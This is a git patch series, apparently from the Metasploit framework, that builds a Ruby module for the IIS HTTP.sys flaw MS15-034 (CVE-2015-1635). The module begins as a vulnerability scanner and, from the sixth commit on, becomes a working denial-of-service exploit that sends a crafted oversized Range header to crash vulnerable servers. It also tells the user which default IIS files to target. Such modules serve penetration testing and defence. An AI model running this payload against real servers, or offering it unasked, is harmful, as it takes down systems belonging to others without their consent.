From 6f874b81ff3b67cbc19c008fca73a1f2fb498f1e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 01:37:43 -0500 Subject: [PATCH 1/9] Add MS15-034 check (CVE-2015-1635) --- .../scanner/http/ms15_034_ulonglongadd.rb | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb new file mode 100644 index 0000000000..2214b70957 --- /dev/null +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS15-034 HTTP Protocol Stack Handling Vulnerability', + 'Description' => %q{ + This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A + vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code + execution. + }, + 'Author' => + [ + 'billbillthebillbill', # He did all the work (see the pastebin code) + 'sinn3r' # MSF version of bill's work + ], + 'References' => + [ + ['CVE', '2015-1635'], + ['MSB', 'MS15-034'], + ['URL', 'http://pastebin.com/ypURDPc4'] + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path', '/']) + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + code = check_host(ip) + case code + when Exploit::CheckCode::Vulnerable + print_good("#{ip}:#{rport} - #{code.last}") + else + print_status("#{ip}:#{rport} - #{code.last}") + end + end + + def check_host(ip) + uri = target_uri.path + + res = send_request_raw({'uri'=>uri}) + unless res + vprint_error("#{ip}:#{rport} - Connection timed out") + return Exploit::CheckCode::Unknown + end + + if !res.headers['Server'].include?('Microsoft-IIS') + vprint_error("#{ip}:#{rport} - Target isn't IIS") + return Exploit::CheckCode::Safe + end + + res = send_request_raw({ + 'uri' => uri, + 'method' => 'GET', + 'vhost' => 'stuff', + 'headers' => { + 'Range' => 'bytes=0-18446744073709551615' + } + }) + if res && res.body.include?('Requested Range Not Satisfiable') + return Exploit::CheckCode::Vulnerable + elsif res && res.body.include?('The request has an invalid header name') + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Unknown + end + end + +end \ No newline at end of file From 63048a73855e3137d91565bd4919d9a824a92d1a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 01:38:09 -0500 Subject: [PATCH 2/9] Newline -_- --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 2214b70957..0df562d40f 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end From 2206ae48a119f79c0d1c8eb571010d43a593bb49 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 01:50:59 -0500 Subject: [PATCH 3/9] Match the PR title --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 0df562d40f..4ea73515d5 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'MS15-034 HTTP Protocol Stack Handling Vulnerability', + 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Vulnerability', 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code From 7a77dbc9f0bbe1af09eda269ecc46f21115fce75 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 10:15:40 -0500 Subject: [PATCH 4/9] Update description --- modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 4ea73515d5..5beab2f56d 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -16,7 +16,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code - execution. + execution. Please note this module could potentially cause a denail-of-service against + the servers you're testing. }, 'Author' => [ From 19ab71aa43a3c726e4280bd6b5851202b27bb54d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 10:20:15 -0500 Subject: [PATCH 5/9] Final update i swear --- .../auxiliary/scanner/http/ms15_034_ulonglongadd.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb index 5beab2f56d..5ae4c1a932 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb @@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'billbillthebillbill', # He did all the work (see the pastebin code) - 'sinn3r' # MSF version of bill's work + 'Bill Finlayson', # He did all the work (see the pastebin code), twitter: @hectorh56193716 + 'sinn3r' # MSF version of bill's work ], 'References' => [ @@ -52,14 +52,20 @@ class Metasploit3 < Msf::Auxiliary end def check_host(ip) - uri = target_uri.path + uri = normalize_uri(target_uri.path) res = send_request_raw({'uri'=>uri}) + unless res vprint_error("#{ip}:#{rport} - Connection timed out") return Exploit::CheckCode::Unknown end + if res.code == 404 + print_error("#{ip}:#{rport} - URI must be a valid resource") + return + end + if !res.headers['Server'].include?('Microsoft-IIS') vprint_error("#{ip}:#{rport} - Target isn't IIS") return Exploit::CheckCode::Safe From 3aa8e6908d7c3cdd5ee2992402eaa2c308bd0643 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:13:16 -0500 Subject: [PATCH 6/9] Converted to a DOS module --- .../http/ms15_034_ulonglongadd.rb | 54 ++++++++++++++----- 1 file changed, 41 insertions(+), 13 deletions(-) rename modules/auxiliary/{scanner => dos}/http/ms15_034_ulonglongadd.rb (52%) diff --git a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb similarity index 52% rename from modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb rename to modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 5ae4c1a932..0b5796012a 100644 --- a/modules/auxiliary/scanner/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -7,50 +7,78 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary + # Watch out, dos all the things include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, - 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Vulnerability', + 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service', 'Description' => %q{ This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code - execution. Please note this module could potentially cause a denail-of-service against - the servers you're testing. + execution. This module will try to cause a denail-of-service. + + Please note that you must supply a valid file resource for the TARGETURI option. + By default, IIS may come with these settings that you could try: iisstart.htm, + welcome.png, iis-85.png, etc. }, 'Author' => [ - 'Bill Finlayson', # He did all the work (see the pastebin code), twitter: @hectorh56193716 - 'sinn3r' # MSF version of bill's work + # Bill did all the work (see the pastebin code), twitter: @hectorh56193716 + 'Bill Finlayson', + # MSF. But really, these people made it happen: + # https://github.com/rapid7/metasploit-framework/pull/5150 + 'sinn3r' ], 'References' => [ ['CVE', '2015-1635'], ['MSB', 'MS15-034'], - ['URL', 'http://pastebin.com/ypURDPc4'] + ['URL', 'http://pastebin.com/ypURDPc4'], + ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'] ], 'License' => MSF_LICENSE )) register_options( [ - OptString.new('TARGETURI', [true, 'The base path', '/']) + OptString.new('TARGETURI', [true, 'A valid file resource', '/welcome.png']) ], self.class) deregister_options('RHOST') end def run_host(ip) - code = check_host(ip) - case code - when Exploit::CheckCode::Vulnerable - print_good("#{ip}:#{rport} - #{code.last}") + if check_host(ip) == Exploit::CheckCode::Vulnerable + dos_host(ip) else - print_status("#{ip}:#{rport} - #{code.last}") + print_status("#{ip}:#{rport} - Probably not vulnerable, will not dos it.") end end + def dos_host(ip) + # In here we have to use Rex because if we dos it, it causes our module to hang too + uri = normalize_uri(target_uri.path) + begin + cli = Rex::Proto::Http::Client.new(ip) + cli.connect + req = cli.request_raw({ + 'uri' => uri, + 'method' => 'GET', + 'vhost' => 'stuff', + 'headers' => { + 'Range' => 'bytes=18-18446744073709551615' + } + }) + cli.send_request(req) + rescue ::Errno::EPIPE, ::Timeout::Error + # Same exceptions the HttpClient mixin catches + end + print_status("#{ip}:#{rport} - DOS request sent") + end + def check_host(ip) uri = normalize_uri(target_uri.path) @@ -62,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary end if res.code == 404 - print_error("#{ip}:#{rport} - URI must be a valid resource") + vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.") return end From 90ed6ee0b6f127d27468c4b95a07e5509906c2c6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:32:11 -0500 Subject: [PATCH 7/9] No "vhost" --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 0b5796012a..a23883a7c0 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -67,7 +67,6 @@ class Metasploit3 < Msf::Auxiliary req = cli.request_raw({ 'uri' => uri, 'method' => 'GET', - 'vhost' => 'stuff', 'headers' => { 'Range' => 'bytes=18-18446744073709551615' } @@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'uri' => uri, 'method' => 'GET', - 'vhost' => 'stuff', 'headers' => { 'Range' => 'bytes=0-18446744073709551615' } From 8a542b841c7dfa2827f08feeb9991fc02b69dfee Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 13:33:09 -0500 Subject: [PATCH 8/9] Don't check Server header --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index a23883a7c0..6e0874e6a9 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -93,11 +93,6 @@ class Metasploit3 < Msf::Auxiliary return end - if !res.headers['Server'].include?('Microsoft-IIS') - vprint_error("#{ip}:#{rport} - Target isn't IIS") - return Exploit::CheckCode::Safe - end - res = send_request_raw({ 'uri' => uri, 'method' => 'GET', From 76d36a46dc640f77b4dc8c91f019d1ef6776b643 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 15 Apr 2015 14:04:18 -0500 Subject: [PATCH 9/9] Missing a checkcode --- modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 6e0874e6a9..5224b89012 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary if res.code == 404 vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.") - return + return Exploit::CheckCode::Unknown end res = send_request_raw({